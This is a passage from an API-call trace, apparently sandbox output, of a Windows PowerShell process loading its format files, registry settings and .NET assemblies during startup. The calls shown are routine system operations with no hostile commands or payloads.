	[0159.535] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.535] GetLastError () returned 0x0
	[0159.535] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.535] GetLastError () returned 0x0
	[0159.535] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0xaca, lpOverlapped=0x0) returned 1
	[0159.535] GetLastError () returned 0x0
	[0159.535] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2232, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2232*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0159.536] GetLastError () returned 0x0
	[0159.536] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0159.536] GetLastError () returned 0x0
	[0159.536] CloseHandle (hObject=0x324) returned 1
	[0159.620] GetLastError () returned 0x0
	[0159.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.620] GetLastError () returned 0x0
	[0159.620] SetErrorMode (uMode=0x1) returned 0x1
	[0159.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f03bc4 | out: lpFileInformation=0x2f03bc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0159.620] GetLastError () returned 0x0
	[0159.621] SetErrorMode (uMode=0x1) returned 0x1
	[0159.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.621] GetLastError () returned 0x0
	[0159.621] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x324) returned 0x0
	[0159.621] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0159.621] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0159.622] RegCloseKey (hKey=0x324) returned 0x0
	[0159.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.622] GetLastError () returned 0x0
	[0159.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.622] GetLastError () returned 0x0
	[0159.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0159.660] GetLastError () returned 0x0
	[0159.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0159.663] GetLastError () returned 0x57
	[0159.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0159.796] GetLastError () returned 0x57
	[0159.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0159.804] GetLastError () returned 0x57
	[0159.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0159.814] GetLastError () returned 0x57
	[0159.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0159.821] GetLastError () returned 0x57
	[0159.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0159.893] GetLastError () returned 0x57
	[0159.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0159.896] GetLastError () returned 0x57
	[0159.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0159.908] GetLastError () returned 0x57
	[0160.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0160.236] GetLastError () returned 0x57
	[0160.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0160.246] GetLastError () returned 0x57
	[0160.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0160.255] GetLastError () returned 0x57
	[0160.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0160.270] GetLastError () returned 0x57
	[0160.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0160.316] GetLastError () returned 0x57
	[0160.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0160.341] GetLastError () returned 0x57
	[0160.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0160.345] GetLastError () returned 0x57
	[0160.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0160.346] GetLastError () returned 0x57
	[0160.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0160.347] GetLastError () returned 0x57
	[0160.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.347] GetLastError () returned 0x57
	[0160.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.348] GetLastError () returned 0x57
	[0160.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.348] GetLastError () returned 0x57
	[0160.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.348] GetLastError () returned 0x57
	[0160.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.348] GetLastError () returned 0x57
	[0160.539] VirtualQuery (in: lpAddress=0xcd690, lpBuffer=0xce690, dwLength=0x1c | out: lpBuffer=0xce690*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.731] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x649929df, Data2=0xbce1, Data3=0x4393, Data4=([0]=0xaf, [1]=0x43, [2]=0x4b, [3]=0x85, [4]=0x45, [5]=0xeb, [6]=0x42, [7]=0x92))) returned 0x0
	[0160.732] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x555e2840, Data2=0xd035, Data3=0x48ee, Data4=([0]=0x84, [1]=0x77, [2]=0x7f, [3]=0x8a, [4]=0xe5, [5]=0xc8, [6]=0x2d, [7]=0xcb))) returned 0x0
	[0160.732] VirtualQuery (in: lpAddress=0xcd708, lpBuffer=0xce708, dwLength=0x1c | out: lpBuffer=0xce708*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.732] VirtualQuery (in: lpAddress=0xcd708, lpBuffer=0xce708, dwLength=0x1c | out: lpBuffer=0xce708*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.732] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xa77da1dc, Data2=0xb9d3, Data3=0x418f, Data4=([0]=0xb6, [1]=0xe, [2]=0x33, [3]=0xc4, [4]=0x18, [5]=0x51, [6]=0xc5, [7]=0xbb))) returned 0x0
	[0160.739] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xb861f0df, Data2=0x2390, Data3=0x4e22, Data4=([0]=0xb4, [1]=0x59, [2]=0xf, [3]=0x56, [4]=0x18, [5]=0xa5, [6]=0x2d, [7]=0xd4))) returned 0x0
	[0160.739] VirtualQuery (in: lpAddress=0xcd834, lpBuffer=0xce834, dwLength=0x1c | out: lpBuffer=0xce834*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.739] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.739] VirtualQuery (in: lpAddress=0xcd6e0, lpBuffer=0xce6e0, dwLength=0x1c | out: lpBuffer=0xce6e0*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.740] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x8fd14ce4, Data2=0xe5b2, Data3=0x46d2, Data4=([0]=0x89, [1]=0x3b, [2]=0xdc, [3]=0xf3, [4]=0x39, [5]=0x86, [6]=0x3a, [7]=0x3))) returned 0x0
	[0160.740] VirtualQuery (in: lpAddress=0xcd834, lpBuffer=0xce834, dwLength=0x1c | out: lpBuffer=0xce834*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.740] VirtualQuery (in: lpAddress=0xcd74c, lpBuffer=0xce74c, dwLength=0x1c | out: lpBuffer=0xce74c*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.744] VirtualQuery (in: lpAddress=0xcd400, lpBuffer=0xce400, dwLength=0x1c | out: lpBuffer=0xce400*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.744] VirtualQuery (in: lpAddress=0xcd400, lpBuffer=0xce400, dwLength=0x1c | out: lpBuffer=0xce400*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.744] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x5217040f, Data2=0xb8ad, Data3=0x4de6, Data4=([0]=0xbd, [1]=0xa0, [2]=0x89, [3]=0xe0, [4]=0x89, [5]=0x93, [6]=0xa4, [7]=0xa5))) returned 0x0
	[0160.744] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x76e90564, Data2=0xd43c, Data3=0x4d6b, Data4=([0]=0xb1, [1]=0x2, [2]=0x9a, [3]=0x97, [4]=0x33, [5]=0x7a, [6]=0x35, [7]=0xd0))) returned 0x0
	[0160.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.744] GetLastError () returned 0x57
	[0160.744] SetErrorMode (uMode=0x1) returned 0x1
	[0160.745] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0160.745] GetLastError () returned 0x0
	[0160.745] GetFileType (hFile=0x34c) returned 0x1
	[0160.745] SetErrorMode (uMode=0x1) returned 0x1
	[0160.745] GetFileType (hFile=0x34c) returned 0x1
	[0160.745] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.745] GetLastError () returned 0x0
	[0160.745] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.745] GetLastError () returned 0x0
	[0160.745] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.746] GetLastError () returned 0x0
	[0160.746] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.746] GetLastError () returned 0x0
	[0160.746] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.746] GetLastError () returned 0x0
	[0160.746] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.746] GetLastError () returned 0x0
	[0160.746] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.746] GetLastError () returned 0x0
	[0160.746] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.746] GetLastError () returned 0x0
	[0160.750] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.750] GetLastError () returned 0x0
	[0160.750] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.750] GetLastError () returned 0x0
	[0160.750] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.750] GetLastError () returned 0x0
	[0160.751] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.751] GetLastError () returned 0x0
	[0160.751] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.751] GetLastError () returned 0x0
	[0160.751] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.751] GetLastError () returned 0x0
	[0160.751] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.752] GetLastError () returned 0x0
	[0160.752] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.752] GetLastError () returned 0x0
	[0160.755] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0160.755] GetLastError () returned 0x0
	[0160.755] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0xbce, lpOverlapped=0x0) returned 1
	[0160.755] GetLastError () returned 0x0
	[0160.755] ReadFile (in: hFile=0x34c, lpBuffer=0x2deb19e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deb19e*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0160.755] GetLastError () returned 0x0
	[0160.755] ReadFile (in: hFile=0x34c, lpBuffer=0x2deba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2deba30*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0160.756] GetLastError () returned 0x0
	[0160.756] CloseHandle (hObject=0x34c) returned 1
	[0160.756] GetLastError () returned 0x0
	[0160.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
